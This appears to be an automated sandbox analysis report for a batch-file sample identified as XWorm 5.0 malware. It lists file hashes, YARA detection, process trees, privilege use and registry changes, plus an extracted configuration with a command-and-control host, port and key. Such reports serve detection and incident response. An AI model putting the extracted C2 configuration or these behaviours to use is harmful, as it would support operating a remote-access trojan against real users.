Analysis
-
max time kernel
1800s -
max time network
1797s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-05-2024 14:55
Static task
static1
Behavioral task
behavioral1
Sample
FN-INTERNAL.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
FN-INTERNAL.bat
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
FN-INTERNAL.bat
Resource
win10v2004-20240508-en
General
-
Target
FN-INTERNAL.bat
-
Size
376KB
-
MD5
121a69448e9f5eef0ba4c1229b471208
-
SHA1
90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
-
SHA256
b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
-
SHA512
c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
-
SSDEEP
6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Extracted
xworm
5.0
software-led.gl.at.ply.gg:38954
m6tgeOEIIMDuaFcQ
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/1308-103-0x00000277A2920000-0x00000277A292E000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1308 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1308 powershell.exe 1528 powershell.exe 4588 powershell.exe 2588 powershell.exe 2024 powershell.exe 1360 powershell.exe 1176 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 2072 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 2072 ComputerDefaults.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx svchost.exe -
Modifies data under HKEY_USERS 53 IoCs
Processes:
svchost.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe -
Modifies registry class 36 IoCs
Processes:
svchost.exeExplorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106192786760" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106825755852" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106195443241" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133612106067474752" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612105831693077" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts\V1\LU\PTT = "133612106071068453" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612106172786875" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106202786950" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612106814193052" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts\V1\LU\PCT = "133612105464036866" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106189661809" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106495755401" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133612096445443001" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133612097051224523" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133612105464036866" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612105464192919" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612106147631139" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612106482786628" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612105544974319" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612105799192988" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612106188880753" svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2024 powershell.exe 2024 powershell.exe 1360 powershell.exe 1360 powershell.exe 1308 powershell.exe 1308 powershell.exe 1176 powershell.exe 1176 powershell.exe 1528 powershell.exe 1528 powershell.exe 2332 powershell.exe 2332 powershell.exe 4588 powershell.exe 4588 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 4072 powershell.exe 4072 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 2588 powershell.exe 2588 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
powershell.exepid process 1308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeIncreaseQuotaPrivilege 2332 powershell.exe Token: SeSecurityPrivilege 2332 powershell.exe Token: SeTakeOwnershipPrivilege 2332 powershell.exe Token: SeLoadDriverPrivilege 2332 powershell.exe Token: SeSystemProfilePrivilege 2332 powershell.exe Token: SeSystemtimePrivilege 2332 powershell.exe Token: SeProfSingleProcessPrivilege 2332 powershell.exe Token: SeIncBasePriorityPrivilege 2332 powershell.exe Token: SeCreatePagefilePrivilege 2332 powershell.exe Token: SeBackupPrivilege 2332 powershell.exe Token: SeRestorePrivilege 2332 powershell.exe Token: SeShutdownPrivilege 2332 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeSystemEnvironmentPrivilege 2332 powershell.exe Token: SeRemoteShutdownPrivilege 2332 powershell.exe Token: SeUndockPrivilege 2332 powershell.exe Token: SeManageVolumePrivilege 2332 powershell.exe Token: 33 2332 powershell.exe Token: 34 2332 powershell.exe Token: 35 2332 powershell.exe Token: 36 2332 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeIncreaseQuotaPrivilege 4588 powershell.exe Token: SeSecurityPrivilege 4588 powershell.exe Token: SeTakeOwnershipPrivilege 4588 powershell.exe Token: SeLoadDriverPrivilege 4588 powershell.exe Token: SeSystemProfilePrivilege 4588 powershell.exe Token: SeSystemtimePrivilege 4588 powershell.exe Token: SeProfSingleProcessPrivilege 4588 powershell.exe Token: SeIncBasePriorityPrivilege 4588 powershell.exe Token: SeCreatePagefilePrivilege 4588 powershell.exe Token: SeBackupPrivilege 4588 powershell.exe Token: SeRestorePrivilege 4588 powershell.exe Token: SeShutdownPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeSystemEnvironmentPrivilege 4588 powershell.exe Token: SeRemoteShutdownPrivilege 4588 powershell.exe Token: SeUndockPrivilege 4588 powershell.exe Token: SeManageVolumePrivilege 4588 powershell.exe Token: 33 4588 powershell.exe Token: 34 4588 powershell.exe Token: 35 4588 powershell.exe Token: 36 4588 powershell.exe Token: SeIncreaseQuotaPrivilege 4588 powershell.exe Token: SeSecurityPrivilege 4588 powershell.exe Token: SeTakeOwnershipPrivilege 4588 powershell.exe Token: SeLoadDriverPrivilege 4588 powershell.exe Token: SeSystemProfilePrivilege 4588 powershell.exe Token: SeSystemtimePrivilege 4588 powershell.exe Token: SeProfSingleProcessPrivilege 4588 powershell.exe Token: SeIncBasePriorityPrivilege 4588 powershell.exe Token: SeCreatePagefilePrivilege 4588 powershell.exe Token: SeBackupPrivilege 4588 powershell.exe Token: SeRestorePrivilege 4588 powershell.exe Token: SeShutdownPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeSystemEnvironmentPrivilege 4588 powershell.exe Token: SeRemoteShutdownPrivilege 4588 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exedescription pid process target process PID 3716 wrote to memory of 2852 3716 cmd.exe cmd.exe PID 3716 wrote to memory of 2852 3716 cmd.exe cmd.exe PID 3716 wrote to memory of 1624 3716 cmd.exe cmd.exe PID 3716 wrote to memory of 1624 3716 cmd.exe cmd.exe PID 3716 wrote to memory of 2024 3716 cmd.exe powershell.exe PID 3716 wrote to memory of 2024 3716 cmd.exe powershell.exe PID 2024 wrote to memory of 1360 2024 powershell.exe powershell.exe PID 2024 wrote to memory of 1360 2024 powershell.exe powershell.exe PID 2024 wrote to memory of 3968 2024 powershell.exe cmd.exe PID 2024 wrote to memory of 3968 2024 powershell.exe cmd.exe PID 3968 wrote to memory of 2072 3968 cmd.exe ComputerDefaults.exe PID 3968 wrote to memory of 2072 3968 cmd.exe ComputerDefaults.exe PID 2072 wrote to memory of 3380 2072 ComputerDefaults.exe cmd.exe PID 2072 wrote to memory of 3380 2072 ComputerDefaults.exe cmd.exe PID 3380 wrote to memory of 1552 3380 cmd.exe cmd.exe PID 3380 wrote to memory of 1552 3380 cmd.exe cmd.exe PID 3380 wrote to memory of 2628 3380 cmd.exe cmd.exe PID 3380 wrote to memory of 2628 3380 cmd.exe cmd.exe PID 3380 wrote to memory of 1308 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 1308 3380 cmd.exe powershell.exe PID 1308 wrote to memory of 1176 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 1176 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 1528 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 1528 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 2332 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 2332 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 4588 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 4588 1308 powershell.exe powershell.exe PID 1308 wrote to memory of 3240 1308 powershell.exe Explorer.EXE PID 1308 wrote to memory of 1180 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2256 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 980 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1752 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2496 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2728 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2684 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2736 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1720 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1128 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2504 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 476 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1408 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 924 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1908 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1512 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1848 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 5052 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1700 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 3472 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1060 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1096 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 4392 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1284 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1480 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2856 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 2656 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1668 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 4024 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1856 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1264 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 1000 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 860 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 460 1308 powershell.exe svchost.exe PID 1308 wrote to memory of 3412 1308 powershell.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
PID:800 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca2⤵PID:1572
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca2⤵PID:1360
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca2⤵PID:2204
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2836
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:1932
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:772
-
-
